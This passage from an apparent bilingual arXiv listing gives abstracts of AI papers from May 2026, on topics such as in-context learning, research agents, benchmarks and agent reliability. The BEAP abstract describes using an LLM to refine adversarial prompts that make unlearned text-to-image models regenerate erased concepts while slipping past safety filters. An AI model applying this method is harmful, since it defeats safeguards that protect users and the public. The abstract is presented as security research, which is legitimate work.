Different visual patterns appear with different frequencies in the world: e.g., beach balls appear on sand more often than they do on a road. These statistics are reflected in vision datasets, and as a result trained models more easily recognize objects in common scenarios. However, recognizing a beach ball on a road may arguably be even more important than recognizing it on sand. We study how to mitigate this discrepancy. Since collecting uncommon images in the real world may be difficult, we explore whether generating images with less frequent contexts can serve as effective training augmentation. A key challenge is guiding generations to remain close to the original dataset distribution while creating diverse images with uncommon contexts. We introduce Decoupling Contextual Patterns with Generations (DecoupleGen), a method that personalizes text-to-image diffusion models to facilitate coherent synthesis of images with rare contexts while preserving original visual details. The generated images contain semantically meaningful content and remain visually aligned with the original datasets. We further apply verification constraints to ensure relevance of the augmented data. We evaluate our approach on object classification and recognition tasks on complex scene datasets. Our experiments demonstrate consistent improvements over previous approaches, and our analyses identify factors underlying these improvements.

2605.26350 2026-05-27 cs.LG cs.AI 版本更新

When Correct Demonstrations Hurt: Rethinking the Role of Exemplars in In-Context Learning

当正确示例有害时:重新思考示例在上下文学习中的作用

Chenghao Qiu, Chunli Peng, Yufeng Yang, Kuan-Hao Huang, Yi Zhou

发表机构 * Texas A&M University(德克萨斯理工大学)

AI总结 本文通过引入任务保持扰动,揭示了正确示例不一定有益甚至可能降低上下文学习准确性的反直觉现象,并提出了上下文证据转移的概念来解释正确性与效用之间的差距。

详情
AI中文摘要

上下文学习(ICL)通常被直觉所驱动,即示例之所以有帮助是因为它们提供了正确的输入-输出对。然而,我们揭示了一个反直觉的现象:正确性并不能保证示例的效用,一些正确的示例甚至可能降低ICL的准确性。为了研究这种正确性-效用差距,我们引入了任务保持扰动,其中仅改变示例输入,而该示例仍然是同一任务的正确实例。具体来说,每个扰动后的示例被赋予由任务映射诱导的目标。该框架涵盖了标签更新扰动(其中任务相关语义发生变化且目标被重新计算)和更严格的目标保持扰动(其中原始目标仍然有效)。我们将由此产生的失败模式形式化为上下文证据转移:任务保持扰动可以改变模型用于上下文推理的有效证据混合,从而将示例正确性与示例效用分离。在情感分类、逻辑推理和数学应用题中,我们发现任务保持扰动的示例会显著降低ICL性能,尤其是对于较小的模型、较难的任务和较高的扰动比例。我们的结果表明,鲁棒的ICL不仅需要评估示例是否正确,还需要评估它们如何影响上下文推理。代码可在 https://github.com/Chenghao-Qiu/Task-Preserving-ICL 获取。

英文摘要

In-context learning (ICL) is often motivated by the intuition that demonstrations help because they provide correct input-output examples. However, we reveal a counterintuitive phenomenon: correctness does not guarantee exemplar utility, and some correct demonstrations can even reduce ICL accuracy. To study this correctness-utility gap, we introduce task-preserving perturbations, where only the exemplar input is changed, while the example remains a correct instance of the same task. Concretely, each perturbed exemplar is assigned the target induced by the task mapping. This framework covers both label-updating perturbations, where task-relevant semantics change and targets are recomputed, and stricter target-preserving perturbations, where the original target remains valid. We formalize the resulting failure mode as contextual evidence shift: task-preserving perturbations can change the effective mixture of evidence used by the model for contextual inference, thereby separating exemplar correctness from exemplar utility. Across sentiment classification, logical reasoning, and math word problems, we find that task-preserving perturbed demonstrations can substantially degrade ICL performance, especially for smaller models, harder tasks, and higher perturbation ratios. Our results show that robust ICL requires evaluating not only whether demonstrations are correct, but also how they influence contextual inference. Code is available at https://github.com/Chenghao-Qiu/Task-Preserving-ICL.

2605.26340 2026-05-27 cs.AI cs.CL cs.MA 版本更新

ScientistOne: Towards Human-Level Autonomous Research via Chain-of-Evidence

ScientistOne: 迈向基于证据链的人类级自主研究

Rui Meng, Bhavana Dalvi Mishra, Jiefeng Chen, Chun-Liang Li, Palash Goyal, Mihir Parmar, Yiwen Song, Yale Song, Rajarishi Sinha, Parthasarathy Ranganathan, Burak Gokturk, Jinsung Yoon, Tomas Pfister

发表机构 * Google Cloud AI Research(谷歌云人工智能研究)

AI总结 提出证据链框架Chain-of-Evidence和自主研究系统ScientistOne,通过可追溯性解决可验证性失败问题,在多项任务上达到或超越人类专家水平。

Comments Project website: https://scientist-one.github.io/

详情
AI中文摘要

自主研究代理能产生有竞争力的解决方案和专业手稿,但其输出存在表面评估无法察觉的可验证性失败:捏造的引用、不可复现的分数以及与实现不符的方法描述。我们通过三项贡献解决这一问题。第一,Chain-of-Evidence (CoE),一个可验证性框架,要求每个声明都能追溯到其证据来源。第二,ScientistOne,一个端到端的自主研究系统,在文献综述、解决方案发现和论文撰写过程中通过构造保持证据链。第三,CoE Audit,一个事后审计,其四项完整性检查——分数验证、规范违反、引用验证和方法-代码对齐——统一适用于所有系统。在涵盖五个系统和五个前沿研究任务的75篇论文中,每个基线都表现出至少一种系统性失败模式:幻觉引用率高达21%,分数验证通过率低至42%,方法-代码对齐率在20%到80%之间。ScientistOne实现了零幻觉引用(0/337)、完美的分数验证(12/12)和最高的方法-代码对齐率(14/15),同时在所有五个任务上达到或超过人类专家表现。ScientistOne进一步泛化到涵盖医学影像、细粒度识别、3D感知和语言建模的六个额外任务,在Parameter Golf上取得最先进结果,并在基线完全失败的MLE-Bench任务上获得金牌。

英文摘要

Autonomous research agents produce competitive solutions and professional-looking manuscripts, yet their outputs contain verifiability failures undetectable by surface-level evaluation: fabricated citations, unreproducible scores, and method descriptions that diverge from the implementation. We address this through three contributions. First, Chain-of-Evidence (CoE), a verifiability framework requiring every claim to be traceable to its evidence source. Second, ScientistOne, an end-to-end autonomous research system that maintains evidence chains by construction throughout literature review, solution discovery, and paper writing. Third, CoE Audit, a post-hoc audit whose four integrity checks -- score verification, specification violation, reference verification, and method-code alignment -- apply uniformly to all systems. Across 75 papers spanning five systems and five frontier research tasks, every baseline exhibits at least one systematic failure mode: hallucinated reference rates reach 21%, score verification passes in as few as 42% of papers, and method-code alignment ranges from 20% to 80%. ScientistOne achieves zero hallucinated references (0/337), perfect score verification (12/12), and the highest method-code alignment (14/15), while matching or exceeding human expert performance on all five tasks. ScientistOne further generalizes to six additional tasks spanning medical imaging, fine-grained recognition, 3D perception, and language modeling, achieving state-of-the-art on Parameter Golf and gold medals on MLE-Bench tasks where baselines fail entirely.

2605.26333 2026-05-27 cs.AI 版本更新

Managing Uncertainty in LLM-Generated Procedural Knowledge for Virtual Laboratory Planning

管理虚拟实验室规划中LLM生成程序性知识的不确定性

Polychronis Karpodinis, Dimitris Kalles

发表机构 * School of Science and Technology, Hellenic Open University(希腊开放大学科学与技术学院)

AI总结 针对LLM生成实验程序存在的不确定性,提出一个原型框架,通过结构化领域表示和不确定的状态转移样本提取候选程序规则,转化为显式约束并修复不确定步骤,以提升虚拟实验室规划的可靠性。

详情
AI中文摘要

教育虚拟实验室可以使实验培训更具可扩展性、适应性和可访问性,尤其是在学生接触物理实验室设施有限的情况下。然而,编写新的模拟实验程序仍然成本高昂:教育工作者必须描述新设备,定义仪器和材料如何交互,并指定可在虚拟环境中执行或评估的有效程序流程。大型语言模型可以通过生成详细的实验程序来辅助这一编写过程,但其输出不应被视为可直接执行的计划。它们可能遗漏必要的操作,步骤顺序错误,或产生逻辑上不正确或与实验室设备不兼容的指令。本文提出了一个用于管理虚拟实验室规划中LLM生成程序性知识不确定性的原型框架。该框架旨在通过使用结构化领域表示和不确定的LLM生成状态转移样本来提取候选程序规则,将其转化为显式且可检查的约束,并利用它们修复不确定的程序步骤,从而减少程序不确定性。尽管动机领域是教育虚拟实验室,但底层问题更为普遍:在结构化交互环境中管理用于行动规划的不确定程序性知识。我们通过一个涉及实验室仪器、容器、工具和材料转移操作的虚拟实验室领域来展示该方法。

英文摘要

Educational virtual laboratories can make experimental training more scala-ble, adaptive, and accessible, especially when students have limited access to physical laboratory facilities. However, authoring new simulated laboratory procedures remains costly: educators must describe new equipment, define how instruments and materials interact, and specify valid procedural flows that can be executed or assessed inside the virtual environment. Large lan-guage models can assist in this authoring process by generating detailed ex-perimental procedures, but their output should not be treated as directly exe-cutable plans. They may omit necessary actions, arrange steps in the wrong order, or produce instructions that are logically incorrect or incompatible with the laboratory equipment. This paper presents a prototype framework for managing uncertainty in LLM-generated procedural knowledge for virtu-al laboratory planning. The framework aims to reduce procedural uncertainty by using structured domain representations and uncertain LLM-generated state-transition samples to extract candidate procedural rules, transform them into explicit and inspectable constraints, and use them to repair uncertain procedural steps. Although the motivating domain refers to educational vir-tual laboratories, the underlying problem is more general: managing uncer-tain procedural knowledge for action planning in structured interactive envi-ronments. We illustrate the approach in a virtual laboratory domain involving laboratory instruments, containers, tools, and material-transfer actions.

2605.26332 2026-05-27 cs.CV cs.AI 版本更新

Erased but Exploitable: Black-box Embedding-Aware Prompting Against Unlearned Text-to-Image Diffusion Models

被擦除但可被利用:针对已遗忘文本到图像扩散模型的黑盒嵌入感知提示攻击

Arian Komaei Koma, Seyed Amir Kasaei, AmirMahdi Sadeghzadeh, Mohammad Hossein Rohban

发表机构 * Department of Computer Engineering(计算机工程系)

AI总结 提出一种黑盒嵌入感知对抗提示攻击BEAP,利用大语言模型迭代生成有效对抗提示,以恢复被遗忘概念,并在攻击成功率上提升超过60%。

详情
AI中文摘要

机器遗忘旨在从预训练的文本到图像扩散模型中移除特定概念,然而已有多种白盒和黑盒攻击被提出以使模型生成这些被遗忘的概念。然而,这些攻击并未假设现实的威胁模型,即它们要么假设可以访问模型权重,要么产生无意义的对抗提示,即使通过简单的基于规则的防护也能轻易检测到。本文旨在填补这一空白。我们提出BEAP,一种黑盒、嵌入感知的对抗提示攻击,利用大语言模型(LLM)迭代生成有效的对抗提示并利用这些隐藏的漏洞。BEAP在文本空间中执行嵌入感知搜索,结合多个奖励信号:被遗忘概念的存在性、文本-图像对齐和图像质量,以优化生成的提示。与之前的攻击方法不同,BEAP使其提示对安全过滤器不可检测,同时生成高质量图像。大量实验表明,BEAP的攻击成功率(ASR)比先前方法提高了60%以上,而每次成功攻击平均仅需15个提示。警告:本文包含可能具有冒犯性或令人不安性质的模型输出。

英文摘要

Machine unlearning aims to remove specific concepts from pretrained text-to-image diffusion models, yet several white- and black-box attacks have been introduced to make the model generate such unlearned concepts. These attacks, nevertheless, do not assume a realistic threat model, i.e. they either assume access to the model weights, or result in gibberish adversarial prompts that could be easily detected even through naive rule-based safeguarding. We aim to address this gap in this paper. We introduce BEAP, a black-box, embedding-aware adversarial prompting attack that leverages a large language model (LLM) to iteratively generate effective adversarial prompts and exploit such hidden vulnerabilities. BEAP performs an embedding-aware search in text space, combining multiple reward signals: unlearned concept presence, text-image alignment, and image quality, to refine generated prompts. Unlike previous attack methods, BEAP keeps its prompts undetectable to safety filters while producing high-quality images. Extensive experiments show that BEAP improves the Attack Success Rate (ASR) by more than 60% over prior methods, while requiring only an average of fifteen prompts per successful attack. Warning: This paper contains model outputs that may be offensive or upsetting in nature.

2605.26329 2026-05-27 cs.AI 版本更新

JobBench: Aligning Agent Work With Human Will

JobBench:使智能体工作符合人类意愿

Yuetai Li, Yichen Feng, Zhangchen Xu, Zixian Ma, Kaiyuan Zheng, Fengqing Jiang, Xinghua Sun, Rulin Shao, Zichen Chen, Yue Huang, Xinyang Han, Brian Lee, Kayla Xu, Shenglai Zeng, Hang Hua, Xiangliang Zhang, Basel Alomair, Ranjay Krishna, Luke Zettlemoyer, Pang Wei Koh, Bhaskar Ramasubramanian, Luyao Niu, Xiang Yue, Radha Poovendran

发表机构 * University of Washington(华盛顿大学) University of California, Santa Barbara(加州大学圣芭芭拉分校) Stanford University(斯坦福大学) Carnegie Mellon University(卡内基梅隆大学) Northwestern University(西北大学) University of Notre Dame(圣母大学) University of California, Berkeley(加州大学伯克利分校) Michigan State University(密歇根州立大学) MIT-IBM Watson AI Lab(MIT-IBM沃森人工智能实验室) Bake AI King Abdulaziz City for Science and Technology(国王阿卜杜勒阿齐兹科技城) Western Washington University(西雅图华盛顿大学) University of Chicago(芝加哥大学)

AI总结 提出JobBench基准,通过专家识别的高优先级工作流程评估AI智能体,以人类需求为中心而非经济价值,覆盖35个职业的130个任务,使用事实锚定的评分链评估,最强模型仅达45.9%,旨在推动从替代到增强的劳动力市场影响。

详情
AI中文摘要

当前职业AI智能体的基准主要基于经济价值,讲述了一个替代的故事。我们引入了JobBench,该基准根据专家识别为高优先级委托的工作流程评估AI智能体,基于人类需求赋权,而非用GDP价值替代他们。JobBench覆盖了35个职业的130个智能体任务。每个任务被打包成一个包含异构参考文件的工作空间,要求智能体在真实专业工作的杂乱信息流中进行推理。输出由事实锚定的评分链进行评分,每个任务平均有35.6个二元标准。我们评估了36个模型;最强的Claude Opus~4.7在Claude Code下仅达到45.9%。我们希望JobBench将社区的目标劳动力市场影响从替代转向增强:构建能够完成人类真正希望委托的任务的智能体,而不仅仅是经济价值最高的任务。

英文摘要

Current benchmarks for occupational AI agents are scoped primarily by economic values, telling a replacement story. We introduce JobBench, which evaluates AI agents on the workflows that experts identify as high-priority for delegation, empowering humans based on their needs instead of replacing them with GDP value. JobBench covers 130 agentic tasks across 35 occupations. Each task is packaged as a workspace of heterogeneous reference files, requiring the agent to reason through the cluttered information streams of real professional work. Outputs are graded by a fact-anchored chain of rubrics, averaging 35.6 binary criteria per task. We evaluate 36 models; the strongest, Claude Opus~4.7 under Claude Code, reaches only 45.9 %. We hope JobBench shifts the community's target labour-market effect from replacement to enhancement: building agents that do what humans actually want delegated, not only what is most economically valuable.

2605.26324 2026-05-27 cs.LG cs.AI cs.NA math.NA 版本更新

Semigroup Consistency as a Diagnostic for Learned Physics Simulators

半群一致性作为学习型物理模拟器的诊断工具

Lennon J. Shikhman

发表机构 * Georgia Institute of Technology(佐治亚理工学院)

AI总结 提出归一化半群误差作为评估学习型物理模拟器时间组合和长程推演一致性的诊断指标,在热传导和Burgers动力学实验中验证其与推演退化正相关。

Comments 10 pages, 3 figures, 3 tables. Accepted to the AI4Physics Workshop at the 43rd International Conference on Machine Learning

详情
AI中文摘要

学习型物理模拟器通常通过单步或短时预测误差来评估,但这些指标可能遗漏时间组合和长程推演中的失败。对于自主、状态完备的系统,精确解映射满足半群定律:直接演化 $s+t$ 应与先演化 $s$ 再演化 $t$ 一致。我们提出归一化半群误差作为事后、模型无关的诊断,比较这些直接和组合的学习预测。在带有时间条件ConvNet和FNO基线的一维热传导和Burgers动力学中,半群误差与推演退化正相关,轨迹级Spearman相关系数 $ρ= 0.635$,95%置信区间 $[0.621, 0.649]$。半群正则化效果不一,支持半群一致性主要作为评估诊断而非普遍有益的训练目标。

英文摘要

Learned physics simulators are often evaluated by one-step or short-horizon prediction error, but these metrics can miss failures in temporal composition and long-horizon rollout. For autonomous, state-complete systems, exact solution maps satisfy a semigroup law: direct evolution over $s+t$ should agree with evolution over $s$ followed by $t$. We propose normalized semigroup error as a post hoc, model-agnostic diagnostic comparing these direct and composed learned predictions. On one-dimensional heat and Burgers dynamics with time-conditioned ConvNet and FNO baselines, semigroup error is positively associated with rollout degradation, with trajectory-level Spearman correlation $ρ= 0.635$ and $95%$ CI $[0.621, 0.649]$. Semigroup regularization has mixed effects, supporting semigroup consistency primarily as an evaluation diagnostic rather than a universally beneficial training objective.

2605.26322 2026-05-27 cs.AI 版本更新

OmniToM: Benchmarking Theory of Mind in LLMs via Explicit Belief Modeling

OmniToM:通过显式信念建模评估大语言模型的心智理论

Adam Bawatneh, Sagar Sapkota, Amrit Singh Bedi, Santu Karmaker, Mubarak Shah

发表机构 * University of Central Florida(佛罗里达大学中央分校)

AI总结 提出OmniToM基准,通过显式信念结构(包括信念提取和标签化两阶段)评估LLM在叙事中追踪不同角色心智状态的能力,揭示其在知识获取和表征决策上的瓶颈。

Comments 30 pages, 8 figures, 19 tables; includes appendix

详情
AI中文摘要

心智理论(ToM)——推断他人知识、意图和情绪的能力——通常通过端点问答在大语言模型(LLM)中评估,其性能仅由对社交推理查询的最终答案判断。这种范式掩盖了模型是否真正构建了稳健推理所需的基础心智状态表征,尤其是在涉及分歧、演变或错误信念的场景中。为填补这一研究空白,我们引入OmniToM,一个通过要求对叙事中所有相关角色显式建模信念结构来直接评估这些表征的基准。这些结构由信念命题组成:关于角色认为世界或他人心智状态为真的最小陈述,使得知识、意图、情绪和错误信念能以通用格式分析。模型分两阶段评估:阶段1:信念提取,从故事中提取与社会动态相关的信念;阶段2:信念标签化,为每个信念分配一个七维模式标签,涵盖递归顺序、真值状态、知识获取、显式性、内容类型、心智来源和上下文。基于现有ToMBench故事语料库中的895个故事,并扩充了22,343个标记的信念命题,OmniToM使用人类校准的LLM辅助标注流水线。在零样本评估中,OmniToM揭示了不同模型存在特定角色的信念追踪瓶颈:当前LLM难以将叙事事实转化为角色信念和共享心智状态所需的知识获取和表征决策。

英文摘要

Theory of Mind (ToM), the ability to infer others' knowledge, intentions, and emotions, is commonly evaluated in large language models (LLMs) using end-point question answering, where performance is judged solely by the final answer to a social reasoning query. This paradigm obscures whether the model actually constructs the underlying mental-state representations required for robust reasoning, particularly in scenarios involving divergent, evolving, or mistaken beliefs. In order to address this research gap, we introduce OmniToM, a benchmark that directly evaluates these representations by requiring explicit modeling of belief structures for all relevant actors within a narrative. These structures are composed of belief propositions: minimal statements of what an actor takes to be true about the world or another actor's mental state, allowing knowledge, intentions, emotions, and false beliefs to be analyzed in a common format. Models are evaluated in two stages: Stage 1: Belief Extraction, which extracts from the story the beliefs relevant to its social dynamics, and Stage 2: Belief Labeling, which assigns each belief a seven-dimensional schema label covering recursive order, truth status, knowledge access, explicitness, content type, mental source, and context. Built from 895 stories from the existing ToMBench story corpus and augmented with 22,343 labeled belief propositions, OmniToM uses a human-calibrated LLM-assisted annotation pipeline. Across diverse models in zero-shot evaluation, OmniToM reveals an actor-specific belief-tracking bottleneck: current LLMs struggle with the knowledge-access and representational decisions required to transform narrative facts into actors' beliefs and shared mental states.

2605.26321 2026-05-27 cs.AI 版本更新

Anchor: Mitigating Artifact Drift in Agent Benchmark Generation

Anchor:缓解智能体基准生成中的工件漂移

Maksim Ivanov, Abhijay Rana

发表机构 * Agentic Labs

AI总结 提出Anchor管道,通过约束优化程序联合生成指令、环境、真值解和验证器,解决基准生成中的工件漂移问题,并构建ERP-Bench基准评估前沿模型性能。

Comments Accepted to RLEval '26 (Workshop at ACM Conference on AI and Agentic Systems 2026)

详情
AI中文摘要

AI智能体开始完成有价值的、长期的企业运营任务,但企业工作的训练和评估环境仍然难以平衡真实性、可验证性和规模。环境和任务创建经常遭受一种我们称之为工件漂移的失败模式:当指令、环境、预言机和验证器由松散耦合的过程创建时,它们经常对任务要求产生分歧,产生不可解、可奖励黑客或不一致的环境。我们引入Anchor,一个任务生成管道,将领域专家对业务工作流的规范形式化为约束优化程序。从单一参数化规范出发,该管道联合生成自然语言指令、环境配置、求解器认证的真实解和基于状态的验证器。使用Anchor,改变参数会产生具有可控难度和已知最优解的新任务,产生与框架无关的环境,其奖励仅取决于最终状态的业务正确性。我们应用Anchor生成ERP-Bench:一个包含300个长期任务的基准,涵盖生产级ERP系统中的采购和制造工作流。我们发现生成参数可预测实际难度,前沿模型在26.1%的试验中满足显式任务约束,但仅在17.4%的试验中达到完全最优解。总体而言,我们表明Anchor和ERP-Bench为构建具有经济价值的智能体工作的可审计评估环境提供了具体方法。我们在erpbench.ai发布任务生成器和ERP-Bench数据集。

英文摘要

AI agents are beginning to complete valuable, long-horizon business operations tasks, but training and evaluation environments for enterprise work still struggle to balance realism, verifiability, and scale. Environment and task creation frequently suffers from a failure mode we call artifact drift: when instructions, environments, oracles, and verifiers are created by loosely coupled processes, they frequently disagree on what a task requires, producing environments that are unsolvable, reward-hackable, or inconsistent. We introduce Anchor, a task-generation pipeline that formalizes domain experts' specifications of business workflows into constraint optimization programs. From a single parametric specification, the pipeline jointly produces a natural-language instruction, environment configuration, solver-certified ground-truth solution, and state-based verifier. With Anchor, altering parameters yields new tasks with controlled difficulty and known optimal solutions, producing harness-agnostic environments whose rewards depend solely on end-state business correctness. We apply Anchor to produce ERP-Bench: a benchmark of 300 long-horizon tasks spanning procurement and manufacturing workflows in a production-grade ERP system. We find that generation parameters predict realized difficulty, and that frontier models satisfy explicit task constraints in 26.1% of trials but reach a fully optimal solution in only 17.4% of trials. Overall, we show that Anchor and ERP-Bench offer a concrete recipe for building auditable evaluation environments for economically valuable agent work. We release the task generator and ERP-Bench dataset at erpbench.ai

2605.26316 2026-05-27 cs.CV cs.AI 版本更新

E$^3$C: Video Generation with 3D Environmental Memory and Ego-Exo Human Pose Control

E$^3$C: 具有3D环境记忆和自我-外部人体姿态控制的视频生成

Qiao Gu, Lingni Ma, Adam W Harley, Richard Newcombe, Florian Shkurti, Julian Straub

发表机构 * Meta Reality Labs(Meta现实实验室) University of Toronto(多伦多大学)

AI总结 提出E$^3$C可控视频扩散框架,通过3D点云记忆和双通道人体控制(自我与外骨骼),实现物理一致的自我中心视频生成。

Comments Preprint. Project Page: https://e3c-videogen.github.io/

详情
AI中文摘要

可控且物理合理的自我中心视频生成对于具身智能体推理自身及他人动作如何表现和改变世界至关重要。与通用视频合成相比,自我中心生成尤其具有挑战性:相机与演员紧密耦合,导致视角快速变化和频繁的自遮挡;底层动作细微、关节化,且通常仅部分可见;人和场景状态必须与指定控制一致地演化。我们提出E$^3$C,一种用于自我中心生成的可控视频扩散框架,构建结构化和紧凑的条件,将持久场景结构与人类驱动动态分离。从上下文帧中,E$^3$C构建基于半稠密点云的3D记忆,并用来自视频VAE特征的外观描述符增强每个点。将此记忆渲染到目标视角产生与目标帧对齐的条件。人类动态单独建模。场景中观察到的人由骨架渲染(外部人体控制)控制,而相机佩戴者由其3D身体关节和6DoF手腕运动(自我人体控制)指定。为了在佩戴者身体部位不可见时保持自我人体控制,我们引入了一个自我运动编码器,生成持久的交叉注意力标记。在Nymeria上的实验表明,E$^3$C在视觉保真度、相机运动准确性、物体一致性以及自我和外部人体控制方面优于强基线,同时还能实现直观的场景编辑。

英文摘要

Controllable and physically grounded egocentric video generation is essential for embodied agents to reason about how their own and others' actions manifest and change the world. Compared to generic video synthesis, egocentric generation is especially challenging: the camera is tightly coupled to the actor, leading to rapid viewpoint changes and frequent self-occlusions; the underlying actions are subtle, articulated, and often only partially visible; and both the people and the scene state must evolve consistently with the specified controls. We present E$^3$C, a controllable video diffusion framework for egocentric generation that builds structured and compact conditions disentangling persistent scene structure from human-driven dynamics. From context frames, E$^3$C constructs a semi-dense point cloud-based 3D memory and augments each point with appearance descriptors from video-VAE features. Rendering this memory into target viewpoints produces conditioning aligned with the target frames. Human dynamics are modeled separately. The observed people in the scene are controlled by skeleton renderings (exo human control), while the camera wearer is specified by their 3D body joints and 6DoF wrist motion (ego human control). To preserve ego human control when the wearer's body parts are invisible, we introduce an ego motion encoder that produces persistent cross-attention tokens. Experiments on Nymeria show that E$^3$C improves visual fidelity, camera-motion accuracy, object consistency, and ego & exo human control over strong baselines, while also enabling intuitive scene editing.

2605.26315 2026-05-27 cs.LG cs.AI 版本更新

Curriculum Learning for Safety Alignment

用于安全对齐的课程学习

Sandeep Kumar, Virginia Smith, Chhavi Yadav

发表机构 * Carnegie Mellon University(卡内基梅隆大学) Simons Institute, UC Berkeley(Simons研究所,伯克利大学)

AI总结 提出基于课程学习的Staged-Competence框架,通过难度分级的偏好数据和渐进式参考模型更新,提升DPO安全对齐的鲁棒性,在三个模型族上平均降低16%的OOD有害响应率和20%的越狱攻击成功率。

Comments Accepted at the ICML 2026 GlobalSouthML Workshop

详情
AI中文摘要

直接偏好优化(DPO)广泛用于大型语言模型的安全对齐。然而,先前的工作表明它脆弱且表现出较差的分布外(OOD)泛化能力。在本文中,我们研究课程学习是否能提高基于DPO的安全对齐的鲁棒性。我们提出Staged-Competence,一个基于课程的框架,它按难度组织偏好数据,采用基于能力的采样,并在训练过程中逐步更新参考模型。在三个模型族上平均,Staged-Competence将OOD有害响应率降低16%,越狱攻击成功率降低20%,同时保持接近零的过度拒绝,保留通用能力。我们进一步表明,Staged-Competence(1)仅使用75%的训练数据即可达到基线安全性,(2)在安全与不安全响应之间产生更好的分离。Staged-Competence与策略优化损失无关,并可扩展到其他DPO变体和对齐领域。我们的代码和数据可在https://github.com/Sandeep5500/curriculum-learning-for-safety获取。

英文摘要

Direct Preference Optimisation (DPO) is widely used for safety alignment in large language models. However, prior work shows it is brittle and exhibits poor out-of-distribution (OOD) generalisation. In this paper, we investigate whether Curriculum Learning can improve the robustness of DPO-based safety alignment. We propose Staged-Competence, a curriculum-based framework that organises preference data by difficulty, employs competence-based sampling, and progressively updates the reference model during training. Averaged across three model families, Staged-Competence reduces OOD harmful response rates by 16% and jailbreak attack success rates by 20%, while preserving general capabilities with near-zero over-refusal. We further show that Staged-Competence (1) matches baseline safety with only 75% of the training data and (2) yields better separation between safe and unsafe responses. Staged-Competence is agnostic to the policy optimisation loss and can extend to other DPO variants and alignment domains. Our code and data are available at https://github.com/Sandeep5500/curriculum-learning-for-safety.

2605.26307 2026-05-27 cs.CR cs.AI cs.NI 版本更新

Intelligent Detection and Mitigation of Carpet-Bombing DDoS Attacks in SDN Using Retrieval-Augmented Generation and Large Language Models

基于检索增强生成和大语言模型的SDN中地毯式轰炸DDoS攻击的智能检测与缓解

Mohammed N. Swileh, Shengli Zhang, Kai Lei

发表机构 * College of Electronics and Information Engineering, Shenzhen University(深圳大学电子与信息工程学院) ICNLab, Shenzhen Graduate School, Peking University(北京大学深圳研究生院ICN实验室)

AI总结 提出一种结合检索增强生成(RAG)和大语言模型(LLM)的框架,通过接口级流量特征、语义嵌入和相似性检索,实现对SDN中地毯式轰炸DDoS攻击的实时检测与缓解,无需传统监督训练。

详情
AI中文摘要

软件定义网络(SDN)提供了灵活可编程的网络管理,但其集中控制架构极易受到分布式拒绝服务(DDoS)攻击,尤其是地毯式轰炸DDoS攻击,该攻击将恶意流量分布到多个目标以逃避传统检测机制。本文提出一种基于检索增强生成(RAG)的框架,用于SDN环境中地毯式轰炸DDoS攻击的实时检测与缓解。该框架结合接口级流量特征表示、语义嵌入生成、基于FAISS的相似性检索以及大语言模型(LLM)驱动的上下文推理,无需传统监督模型训练或再训练即可对流量行为进行分类。为评估所提框架的有效性,在多种不同攻击强度的地毯式轰炸DDoS攻击场景下进行了大量实验。此外,使用多个最先进的LLM研究了两种流量表示策略,即基于结构化JSON的表示和基于自然语言的表示(NLR)。实验结果表明,所提框架实现了高度准确且稳定的攻击检测性能,其中使用Gemma-4-31B-IT模型的框架配置取得了最强的整体检测结果。此外,实时实验证实了所提框架能够快速检测并缓解地毯式轰炸DDoS攻击,同时保持SDN网络稳定运行。所得结果凸显了将RAG机制与LLM集成用于智能自适应SDN安全分析的有效性。

英文摘要

Software-Defined Networking (SDN) provides flexible and programmable network management; however, its centralized control architecture remains highly vulnerable to Distributed Denial-of-Service (DDoS) attacks, particularly Carpet-Bombing DDoS attacks that distribute malicious traffic across multiple targets to evade conventional detection mechanisms. In this paper, a Retrieval-Augmented Generation (RAG)-based framework is proposed for real-time detection and mitigation of Carpet-Bombing DDoS attacks in SDN environments. The proposed framework combines interface-level traffic features representation, semantic embedding generation, FAISS-based similarity retrieval, and Large Language Model (LLM)-driven contextual inference to classify traffic behavior without requiring conventional supervised model training or retraining. To evaluate the effectiveness of the proposed framework, extensive experiments were conducted under multiple Carpet-Bombing DDoS attack scenarios with different attack intensities. In addition, two traffic representation strategies, namely structured JSON-based representation and natural language-based representation (NLR), were investigated using multiple state-of-the-art LLMs. The experimental results demonstrate that the proposed framework achieved highly accurate and stable attack detection performance, while the framework configuration utilizing the Gemma-4-31B-IT model achieved the strongest overall detection results. Furthermore, real-time experiments confirmed the capability of the proposed framework to rapidly detect and mitigate Carpet-Bombing DDoS attacks while maintaining stable SDN network operation. The obtained results highlight the effectiveness of integrating RAG mechanisms with LLM for intelligent and adaptive SDN security analysis.

2605.26302 2026-05-27 cs.AI cs.CL cs.MA 版本更新

Your Agents Are Aging Too: Agent Lifespan Engineering for Deployed Systems

你的智能体也在老化:面向部署系统的智能体寿命工程

Jianing Zhu, Yeonju Ro, John Robertson, Kevin Wang, Junbo Li, Haris Vikalo, Aditya Akella, Zhangyang Wang

发表机构 * The University of Texas at Austin(德克萨斯大学奥斯汀分校)

AI总结 提出 AgingBench 基准,通过四种老化机制和诊断工具评估部署后智能体的可靠性退化,并指出需要寿命评估、机制级诊断和阶段针对性修复。

详情
AI中文摘要

长寿命AI智能体越来越多地被部署为持久化运行系统,但它们仍然像刚初始化的模型一样被评估。第一天基准测试忽略了一个基本系统问题:智能体在部署后能保持可靠多久?即使模型权重被冻结,智能体的有效状态也在不断变化,因为它压缩交互历史、从不断增长的记忆库中检索、在更新后修正事实,并经历常规维护。因此,可靠性成为整个智能体框架的寿命属性,而不仅仅是基础模型的快照属性。我们引入了AgingBench,一个用于智能体寿命工程的纵向可靠性基准:不仅测量部署的智能体是否退化,还测量退化的形式以及修复应针对何处。AgingBench将智能体老化组织为四种机制:压缩老化、干扰老化、修订老化和维护老化。为了诊断这些故障,AgingBench使用时间依赖图和对偶反事实探针,为记忆管道的写入、检索和利用阶段生成诊断档案。在7个场景、14个模型、多种记忆策略以及运行者控制和自主智能体上,跨越约400次运行(涵盖8到200个会话)的结果表明,智能体老化不是一维的:行为测试可以保持干净,而事实精度下降;派生状态跟踪可能在单个模型内急剧崩溃;相同的错误答案可能需要不同的修复,具体取决于诊断档案指向的内容。这些结果表明,可靠的智能体部署需要寿命评估、机制级诊断和阶段针对性修复,而不仅仅是更强的第一天模型。

英文摘要

Long-lived AI agents are increasingly deployed as persistent operational systems, yet they are still evaluated like freshly initialized models. Day-one benchmarks miss a basic systems question: how long does an agent remain reliable after deployment? Even when model weights are frozen, an agent's effective state keeps changing as it compresses interaction history, retrieves from a growing memory store, revises facts after updates, and undergoes routine maintenance. Reliability therefore becomes a lifespan property of the full agent harness, not only a snapshot property of the base model. We introduce AgingBench, a longitudinal reliability benchmark for agent lifespan engineering: measuring not only whether deployed agents degrade, but what form the degradation takes and where repair should target. AgingBench organizes agent aging into four mechanisms: compression aging, interference aging, revision aging, and maintenance aging. To diagnose these failures, 